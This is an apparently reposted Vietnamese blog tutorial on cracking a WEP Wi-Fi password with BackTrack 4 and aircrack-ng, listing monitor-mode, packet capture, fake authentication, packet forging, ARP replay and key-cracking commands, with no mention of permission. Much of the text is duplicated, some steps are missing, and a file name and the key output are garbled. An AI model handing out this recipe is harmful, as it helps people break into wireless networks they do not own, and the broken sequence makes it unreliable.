Hướng dẫn hack Wifi(WEP)i bằng Backtrack 4
Thiết bị cần thiết:
- Một AP làm AP target
- Một PC có card wireless làm client target.
- Một PC có card wireless làm attacker
- Một đĩa CD backtrack 4.0 beta
Mở Shell 1
Dùng lệnh iwconfig để kiểm tra card mạng đang sử dụng của mình.
Như trong hình thì card mạng của mình có tên là wlan0
[1] airmon-ng start wlan0
[2] airodump-ng mon0
[2] airodump-ng mon0
Khi đã tìm thấy Access Point (AP) cần lấy pass ta bấm Ctrt + C để dừng quá trình quét
BSSID: 00:14:6C:02:C0:FE
CH: 11
ESSID: NETGEAR
--> chú ý những thông số này sẽ thay đổi theo từng cấu hình máy của bạn, Access Point …
Tiếp theo ta thực hiện lệnh [3] airodump-ng --bssid 00:14:6C:02:C0:FE --channel 11 -w NETGEAT mon0
Khi thực thi xong lệnh trên, thì trên màn hình desktop sẽ xuất hiện một số file mới, ta sẽ chú ý đến file NETGEAR 01.cap vừa mới tạo.
CH: 11
ESSID: NETGEAR
--> chú ý những thông số này sẽ thay đổi theo từng cấu hình máy của bạn, Access Point …
Tiếp theo ta thực hiện lệnh [3] airodump-ng --bssid 00:14:6C:02:C0:FE --channel 11 -w NETGEAT mon0
Khi thực thi xong lệnh trên, thì trên màn hình desktop sẽ xuất hiện một số file mới, ta sẽ chú ý đến file NETGEAR 01.cap vừa mới tạo.
Mở Shell 3
[5]** aireplay-ng -1 1 -a 00:14:6C:02:C0:FE mon0
[5]** aireplay-ng -1 1 -a 00:14:6C:02:C0:FE mon0
Quay lại Shell 2 kiểm tra file vừa tạo xong ở đây ta được file fragment-1005-2004845.xor
[6]** packetforge-ng -0 -a 00:14:6C:02:C0:FE -h 00:11:22:33:44:55 -l 255.255.255.255 -k 255.255.255.255 -y fragment-1005-2004845.xor -w arpy
[6]** packetforge-ng -0 -a 00:14:6C:02:C0:FE -h 00:11:22:33:44:55 -l 255.255.255.255 -k 255.255.255.255 -y fragment-1005-2004845.xor -w arpy
[7]** aireplay-ng -3 -r arpy -b 00:14:6C:02:C0:FE mon0
Khi thực hiện lệnh trên thì số lượng data thu nhận ở Shell 1 tăng lên nhanh chóng, theo thông tin thì để crack wep 64bit thì cần tối thiểu 20.000 packet, crack wep 128bit thì cần tối thiểu 40.000 packet. Do đó để đạt hiệu quả tối đa bạn nên chờ đến khi đạt đến số lượng như trên để thực hiện tiếp dòng lệnh tiếp theo.
[8]** aircrack-ng NETGEAR-01.cap
NETGEAR-01.cap là file được tạo từ bước 1
Khi thực hiện lệnh trên thì số lượng data thu nhận ở Shell 1 tăng lên nhanh chóng, theo thông tin thì để crack wep 64bit thì cần tối thiểu 20.000 packet, crack wep 128bit thì cần tối thiểu 40.000 packet. Do đó để đạt hiệu quả tối đa bạn nên chờ đến khi đạt đến số lượng như trên để thực hiện tiếp dòng lệnh tiếp theo.
[8]** aircrack-ng NETGEAR-01.cap
NETGEAR-01.cap là file được tạo từ bước 1
Và bây giờ bạn hãy xem thành quả của mình
KEY FOUND ! [D4 :F5 :07
E :E5]
Key bạn cần tìm sẽ là D4F507DEE5.
*
Chú ý:
00:14:6C:02:C0:FE –> địa chỉ Access Point
wlan0 –> tên card mạng của bạn
mon0 –> interface card mạng của bạn
Trên mạng hiện giờ có rất nhiều công cụ cũng như phần mềm để bẻ khóa mật khẩu mã hóa theo dạng WEP , WPA, WPA2, tiêu biểu nhất là phần mềm Black… Những phần mềm bẻ khóa này có thể chạy tốt trên máy tính sử dụng hệ điều hành Window hoặc Linux, miễn là máy tính đó có card không
KEY FOUND ! [D4 :F5 :07
E :E5]Key bạn cần tìm sẽ là D4F507DEE5.
*
Chú ý:
00:14:6C:02:C0:FE –> địa chỉ Access Point
wlan0 –> tên card mạng của bạn
mon0 –> interface card mạng của bạn
Trên mạng hiện giờ có rất nhiều công cụ cũng như phần mềm để bẻ khóa mật khẩu mã hóa theo dạng WEP , WPA, WPA2, tiêu biểu nhất là phần mềm Black… Những phần mềm bẻ khóa này có thể chạy tốt trên máy tính sử dụng hệ điều hành Window hoặc Linux, miễn là máy tính đó có card không
dây.
Bài viết do mình sưu tầm được,
Không có nhận xét nào:
Đăng nhận xét